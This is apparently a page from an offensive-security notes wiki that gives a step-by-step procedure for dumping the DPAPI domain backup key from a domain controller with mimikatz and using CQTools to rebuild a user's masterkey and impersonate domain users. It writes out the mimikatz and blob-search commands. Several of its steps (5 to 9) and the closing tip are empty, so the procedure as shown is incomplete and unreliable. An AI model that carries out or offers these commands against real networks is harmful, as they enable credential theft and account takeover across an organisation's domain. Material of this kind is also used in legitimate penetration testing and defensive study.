githubEdit

DPAPI Domain Backup Key

Exporting DPAPI Domain Backup Key from a domain controller with mimikatz, and explaining how to recreate a user's masterkey (AKA Impersonate ANYONE within the domain)

Tools:

  1. Mimikatz

  2. CQTools https://github.com/BlackDiverX/cqtools

Requirements: System level access on the host

Steps:

1)

mimikatz.exe 

2) Dump the DPAPI Domain Backup Key from DC

lsadump::backupkeys /system:localhost /export 

3) Transfer the .pfx container, as well as some of the CQtools (CQDPAPIBlobSearcher.exe and CQMasterKeyAD.exe to target machine of your choice)

4) Finds the Masterkey, which shown as mkguid on results

CQDPAPIBlobSearcher.exe /d c:\users\USER\AppData\Roaming /r /o c:users\USER\Desktop\blob 

5) Attacking machine:

6) Attacking machine: (Use cqure as passphrase. We repacked the pfx using "cqure" as passphrase to make the cqtool work or else it will fail)

7)

8)

9)

10) Shuffle the old and new masterkey files, then give the same attributes to the newly created masterkey file as the old one

11) VOILA!

TIP: In case we cannot crack the NTLM password of a user, we can simply create a new password with mimikatz:

Last updated